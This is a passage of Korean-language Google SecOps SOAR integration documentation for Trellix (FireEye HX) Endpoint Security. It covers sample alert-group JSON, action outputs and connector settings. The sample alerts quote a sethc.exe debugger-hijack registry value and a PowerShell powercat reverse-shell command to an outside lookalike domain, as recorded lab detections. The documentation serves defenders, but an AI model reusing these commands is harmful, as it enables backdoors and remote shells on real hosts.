"url": "/hx/api/v3/conditions/2npvcLf_arxPaH717hQZ9g=="
},
"event_at": "2020-12-10T09:26:14.114+00:00",
"matched_at": "2020-12-10T09:26:56+00:00",
"reported_at": "2020-12-10T09:27:08.735+00:00",
"source": "IOC",
"resolution": "ALERT",
"decorators": [],
"md5values": [],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/723",
"event_id": 880771,
"event_type": "regKeyEvent",
"event_values": {
"regKeyEvent/timestamp": "2020-12-10T09:26:14.114Z",
"regKeyEvent/hive": "HKEY_LOCAL_MACHINE\\SOFTWARE",
"regKeyEvent/keyPath": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
"regKeyEvent/path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger",
"regKeyEvent/eventType": 1,
"regKeyEvent/pid": 8740,
"regKeyEvent/process": "reg.exe",
"regKeyEvent/processPath": "C:\\Windows\\System32",
"regKeyEvent/valueName": "Debugger",
"regKeyEvent/valueType": "REG_SZ",
"regKeyEvent/value": "QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAAAA=",
"regKeyEvent/text": "C:\\Windows\\System32\\cmd.exe",
"regKeyEvent/username": "FIREEYE-LAB\\Administrator"
},
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 2
},
"url": "/hx/api/v3/alert_groups/e9f4d7baaa362d9d5d0b6e053ba0d44d",
"created_at": "2020-12-10T08:04:54.740Z",
"acknowledgement": {
"acknowledged": true,
"acknowledged_by": "test2",
"acknowledged_time": "2020-12-22T19:00:25.688Z",
"comment": "test comment",
"comment_update_time": "2020-12-22T19:00:25.688Z"
},
"grouped_by": {
"condition_id": "2npvcLf_arxPaH717hQZ9g==",
"detected_by": "ioc_engine",
"host": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"hostname": "HW-HOST-FY01",
"primary_ip_address": "172.30.202.152"
}
}
}
]
},
"message": "OK",
"details": [],
"route": "/hx/api/v3/alert_groups"
}
케이스 월
| 결과 유형 | 값/설명 | 유형 |
|---|---|---|
| 출력 메시지* | 작업이 실패하거나 플레이북 실행을 중지하지 않습니다. '모든 알림 그룹의 확인 상태를 업데이트했습니다.' 일부만 성공한 경우: (제공된 ID 수가 총계보다 많음) - '{succesfull_alert_groups_ids} 알림 그룹 ID의 알림을 가져왔습니다.' 알림 그룹 세부정보를 가져올 수 없는 경우: '제공된 알림 그룹 ID의 알림을 가져올 수 없습니다. 제공된 ID를 확인하고 다시 시도하세요.' 작업이 실패하고 플레이북 실행을 중지합니다. |
일반 |
호스트 알림 그룹 가져오기
설명
Trellix Endpoint Security의 호스트와 관련된 알림 그룹을 나열합니다. 지원되는 항목: 호스트 이름, IP 주소
매개변수
| 매개변수 표시 이름 | 유형 | 기본값 | 필수 항목 | 설명 |
|---|---|---|---|---|
| 확인 필터 | DDL | 모두 확인됨만 미확인됨만 |
No | 모든 알림 그룹을 반환할지 또는 확인된/미확인된 알림 그룹만 반환할지 지정합니다. |
| 반환할 최대 알림 그룹 수 | 정수 | 20 | No | 엔티티당 반환할 알림 그룹 수를 지정합니다. 기본값: 20 |
실행
이 작업은 다음 항목에서 실행됩니다.
- IP 주소
- 호스트 이름
작업 결과
스크립트 결과
| 스크립트 결과 이름 | 값 옵션 | 예시 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON 결과
{
"_id": "6d9a68f2a78f8d983bd3c0f4556785e6",
"assessment": "[Heur.BZC.ONG.Cheetah.3.1C89233F]",
"file_full_path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"first_event_at": "2021-07-01T09:44:18.809Z",
"last_event_at": "2021-07-01T09:44:18.809Z",
"dispositions": [],
"source": "MAL",
"has_fp_disposition": false,
"last_alert": {
"_id": 812,
"agent": {
"_id": "JS2asEbMWGgfxT0aHVu034",
"url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
"hostname": "FireEye-Domain",
"containment_state": "normal"
},
"event_at": "2021-07-01T09:44:18.809+00:00",
"matched_at": "2021-07-01T09:44:18.809+00:00",
"reported_at": "2021-07-01T09:44:20.353+00:00",
"source": "MAL",
"resolution": "QUARANTINED",
"decorators": [],
"md5values": [
"36be03ea88f7d1effcafeeb65e0e1e57"
],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/812",
"condition": null,
"event_id": null,
"event_type": null,
"event_values": {
"system-data": {
"xmlns": "http://www.fireeye.com/antimalware-alert",
"xmlns:xsi": "http://www.w3.org/2001/XMLSchema-instance",
"xsi:schemaLocation": "http://www.fireeye.com/antimalware-alert AM-alert.xsd",
"alert-version": "3",
"correlation-id": "d01e8ea6-4d34-4005-8482-3ccc026e11ea",
"timestamp": "2021-07-01T09:44:18.809Z",
"product-version": "32.36.0",
"engine-version": "11.0.1.19",
"content-version": "7.86346",
"mg-engine-version": "32.30.0.8460",
"mg-content-version": "25",
"whitelist-schema-version": "1.0.0",
"whitelist-content-version": "1.32.1"
},
"os-details": {
"$": {
"name": "windows",
"version": "10.0.14393",
"patch": "0",
"os-arch": "64-bit",
"os-language": "en-US"
}
},
"scan-type": "oas",
"scanned-object": {
"scanned-object-type": "file-event",
"file-event": {
"file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"actor-process": {
"pid": "1268",
"path": "C:\\Windows\\System32\\xcopy.exe",
"user": {
"username": "",
"domain": ""
}
},
"sub-type": "FILE_OPERATION_CLOSED"
}
},
"detections": {
"detection": [
{
"engine": {
"engine-type": "av",
"engine-version": "11.0.1.19",
"content-version": "7.86346"
},
"infected-object": {
"object-type": "file",
"file-object": {
"file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"inner-file-path": "",
"original-file-name": "",
"container": "false",
"packed": "false",
"hidden": "false",
"system-file": "false",
"read-only": "false",
"temporary": "false",
"md5sum": "36be03ea88f7d1effcafeeb65e0e1e57",
"sha1sum": "ce1cdd84732367cbf2be60df57c52760bf2e8fe9",
"sha256sum": "3862ddf0a77ef8e7e17c641939a6dc349885c1a08cd64748ec50358adafe0631",
"size-in-bytes": "753",
"creation-time": "2021-07-01T09:41:47.610Z",
"modification-time": "2020-05-29T09:34:17.066Z",
"access-time": "2021-07-01T09:41:47.610Z"
}
},
"infection": {
"confidence-level": "high",
"infection-type": "malware",
"infection-name": "Heur.BZC.ONG.Cheetah.3.1C89233F"
},
"action": {
"actioned-object": {
"object-type": "file",
"file-object": {
"file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"inner-file-path": "",
"original-file-name": "",
"container": "false",
"packed": "false",
"hidden": "false",
"system-file": "false",
"read-only": "false",
"temporary": "false",
"md5sum": "36be03ea88f7d1effcafeeb65e0e1e57",
"sha1sum": "ce1cdd84732367cbf2be60df57c52760bf2e8fe9",
"sha256sum": "3862ddf0a77ef8e7e17c641939a6dc349885c1a08cd64748ec50358adafe0631",
"size-in-bytes": "753",
"creation-time": "2021-07-01T09:41:47.610Z",
"modification-time": "2020-05-29T09:34:17.066Z",
"access-time": "2021-07-01T09:41:47.610Z"
}
},
"requested-action": "clean",
"applied-action": "quarantine",
"result": "success",
"error": "0",
"reboot-required": "false"
}
}
]
},
"scan-statistics": {
"total-scan-time-in-ms": "12227"
}
},
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 1
},
"url": "/hx/api/v3/alert_groups/6d9a68f2a78f8d983bd3c0f4556785e6",
"created_at": "2021-07-01T09:44:23.726Z",
"acknowledgement": {
"acknowledged": false,
"acknowledged_by": null,
"acknowledged_time": null,
"comment": null,
"comment_update_time": null
},
"grouped_by": {
"md5sum": "36be03ea88f7d1effcafeeb65e0e1e57",
"file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"infection-name": "Heur.BZC.ONG.Cheetah.3.1C89233F",
"detected_by": "malware_file_access_scan",
"host": {
"_id": "JS2asEbMWGgfxT0aHVu034",
"url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
"hostname": "FireEye-Domain",
"primary_ip_address": "172.30.202.71"
}
}
},
{
"_id": "0043aa34dea99c23996c2f16291cdb4e",
"assessment": "[Process powershell.exe started] POWERCAT (UTILITY)",
"file_full_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"first_event_at": "2021-07-01T09:41:50.428Z",
"last_event_at": "2021-07-01T09:41:50.428Z",
"dispositions": [],
"source": "IOC",
"has_fp_disposition": false,
"last_alert": {
"_id": 811,
"agent": {
"_id": "JS2asEbMWGgfxT0aHVu034",
"url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
"hostname": "FireEye-Domain",
"containment_state": "normal"
},
"condition": {
"_id": "KBvTAC_L_GiI9BZbph2GoA==",
"url": "/hx/api/v3/conditions/KBvTAC_L_GiI9BZbph2GoA=="
},
"event_at": "2021-07-01T09:41:50.428+00:00",
"matched_at": "2021-07-01T09:43:29+00:00",
"reported_at": "2021-07-01T09:44:09.339+00:00",
"source": "IOC",
"resolution": "ALERT",
"decorators": [],
"md5values": [
"097ce5761c89434367598b34fe32893b"
],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/811",
"event_id": 11311494,
"event_type": "processEvent",
"event_values": {
"processEvent/timestamp": "2021-07-01T09:41:50.428Z",
"processEvent/eventType": "start",
"processEvent/pid": 3676,
"processEvent/processPath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"processEvent/process": "powershell.exe",
"processEvent/parentPid": 2496,
"processEvent/parentProcessPath": "C:\\Windows\\System32\\cmd.exe",
"processEvent/parentProcess": "cmd.exe",
"processEvent/username": "FIREEYE-LAB\\Administrator",
"processEvent/startTime": "2021-07-01T09:41:50.428Z",
"processEvent/md5": "097ce5761c89434367598b34fe32893b",
"processEvent/processCmdLine": "powershell -Exec Bypass \". \\\"C:\\TMP\\nc.ps1\\\";powercat -c www.googleaccountsservices.com -p 80 -t 2 -e cmd\""
},
"multiple_match": "Multiple Indicators Matched.",
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 1
},
"url": "/hx/api/v3/alert_groups/0043aa34dea99c23996c2f16291cdb4e",
"created_at": "2021-07-01T09:44:13.744Z",
"acknowledgement": {
"acknowledged": false,
"acknowledged_by": null,
"acknowledged_time": null,
"comment": null,
"comment_update_time": null
},
"grouped_by": {
"condition_id": "KBvTAC_L_GiI9BZbph2GoA==",
"detected_by": "ioc_engine",
"host": {
"_id": "JS2asEbMWGgfxT0aHVu034",
"url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
"hostname": "FireEye-Domain",
"primary_ip_address": "172.30.202.71"
}
}
케이스 월
| 결과 유형 | 값/설명 | 유형 |
|---|---|---|
| 출력 메시지\* | 작업이 실패하거나 플레이북 실행을 중지하지 않습니다. 1개에 대해 데이터를 사용할 수 없는 경우(is_success = true): '작업이 Trellix Endpoint Security: {entity.identifier} 항목의 알림 그룹을 가져올 수 없습니다.' 모두에 대해 데이터를 사용할 수 없는 경우(is_success=false): 'Trellix Endpoint Security에서 제공된 항목의 알림 그룹을 찾을 수 없습니다.' 작업이 실패하고 플레이북 실행을 중지합니다. |
일반 |
| 케이스 월 테이블 | 열:
|
항목 |
커넥터
FireEye HX Alerts Connector
설명
Google SecOps SOAR Trellix Endpoint Security Alerts Connector는 Trellix Endpoint Security 서버에서 생성된 알림을 수집합니다.
이 커넥터는 주기적으로 Trellix Endpoint Security API 서버 엔드포인트에 연결하고 특정 기간 동안 생성된 알림 목록을 가져옵니다. 새 알림이 있으면 커넥터는 Trellix Endpoint Security 알림을 기반으로 Google SecOps SOAR 알림을 생성하고 커넥터 타임스탬프를 마지막으로 성공적으로 수집된 알림 시간으로 저장합니다. 다음 커넥터 실행에서 커넥터는 타임스탬프에서 생성된 알림만 Trellix Endpoint Security API에 쿼리합니다(타임스탬프 외에도 커넥터가 '중단'되지 않도록 일부 '기술' 오프셋). 새 알림이 없으면 현재 실행을 종료합니다.
API 권한
Trellix Endpoint Security Alerts Connector는 기존 FireEye 통합과 동일한 API 인증 방법 및 권한을 사용합니다. FireEye 알림을 사용하기 위해서는 통합에 사용되는 계정에는 'API 분석가' 또는 " API 관리자' 역할이 있어야 합니다.
Google SecOps에서 FireEye HX Alerts Connector 구성
Google SecOps에서 커넥터를 구성하는 방법에 대한 자세한 내용은 커넥터 구성을 참고하세요.
커넥터 매개변수
다음 매개변수를 사용하여 커넥터를 구성합니다.
| 매개변수 표시 이름 | 유형 | 기본값 | 필수 항목 | 설명 |
|---|---|---|---|---|
| 제품 필드 이름 | 문자열 | ProductName | 예 | 플랫폼 정의 설명입니다. 필드는 변경할 수 없습니다. |
| 이벤트 필드 이름 | 문자열 | AlertName | 예 | 플랫폼 정의 설명입니다. 필드는 변경할 수 없습니다. |
| 환경 필드 이름 | 문자열 | "" | 아니요 | 환경 이름이 저장된 필드의 이름을 설명합니다. 환경 필드를 찾을 수 없는 경우 환경은 ''입니다. |
| 환경 정규식 패턴 | 문자열 | .* | 아니요 | '환경 필드 이름' 필드에 있는 값에서 실행할 정규식 패턴입니다. 기본값은 .*로서 모두 포착하고 변경되지 않은 값을 반환합니다. 사용자가 정규식 로직을 통해 환경 필드를 조작할 수 있도록 허용하는 데 사용됩니다. 정규식 패턴이 null이거나 비어 있거나 환경 값이 null이면 최종 환경 결과는 ''입니다. |
| 스크립트 제한 시간(초) | 정수 | 180 | 예 | 현재 스크립트를 실행하는 Python 프로세스의 제한 시간 한도입니다. |
| API 루트 | 문자열 | https://x.x.x.x:<port> | 예 | Trellix Endpoint Security Server API 기준 URL |
| 사용자 이름 | 문자열 | 해당 사항 없음 | 예 | 인증에 사용할 Trellix Endpoint Security 사용자 |
| 비밀번호 | 비밀번호 | 해당 사항 없음 | 예 | 인증에 사용할 Trellix Endpoint Security 사용자 비밀번호 |
| SSL 확인 | 체크박스 | 선택 | 예 | 지정된 경우 커넥터는 Trellix Endpoint Security가 유효한 SSL 인증서로 구성되어 있는지 확인합니다. 인증서가 유효하지 않으면 커넥터에서 오류를 반환합니다. |
| 오프셋 시간(시간) | 정수 | 24 | 예 | X시간부터 역순으로 알림을 가져옵니다. |
| 주기당 최대 알림 수 | 정수 | 25 | 예 | 커넥터 실행 한 번에 처리할 알림 수입니다. |
| 알림 유형 | 문자열 | active_threat | No | 수집할 Trellix Endpoint Security 알림 유형을 지정합니다. 기본적으로 active_threat로 설정되어 ALERT 및 QUARANTINED/partial_block 상태의 알림을 반환합니다. 다른 유효한 매개변수는 ALERT로서 미해결 알림만 반환합니다. |
| 허용 목록을 차단 목록으로 사용 | 체크박스(체크박스) | 선택 해제 | 예 | 사용 설정하면 허용 목록이 차단 목록으로 사용됩니다. |
| 프록시 서버 주소 | IP_OR_HOST | 해당 사항 없음 | No | 연결에 사용할 프록시 서버입니다. |
| 프록시 서버 사용자 이름 | 문자열 | 해당 사항 없음 | No | 프록시 서버 사용자 이름입니다. |
| 프록시 서버 비밀번호 | 비밀번호 | 해당 사항 없음 | No | 프록시 서버 비밀번호입니다. |
커넥터 규칙
- 차단 목록 차단 목록 규칙이 지원되어야 하지만 커넥터는 기본적으로 허용 목록 로직을 사용합니다.
- 허용 목록 규칙 기본적으로 사용됩니다.
- 프록시 지원 이 커넥터는 프록시를 지원합니다.
- Default ConnectorRules
| RuleType(허용 목록\차단 목록) | RuleName(문자열) |
|---|---|
| WhiteList | 이 섹션에서 알림 소스 및 하위유형 속성을 기반으로 수집할 알림을 지정합니다. 예를 들어 지표 알림의 경우 'IOC', 'AV' 하위유형이 있는 멀웨어 알림만 수집하려면 'MAL AV', 하위유형과 상관없이 모든 멀웨어 알림을 수집하려면 'MAL'을 지정합니다. 모든 알림을 수집하려면 허용 목록 섹션에서 모든 항목을 삭제하세요. |
도움이 더 필요하신가요? 커뮤니티 회원 및 Google SecOps 전문가로부터 답변을 받으세요.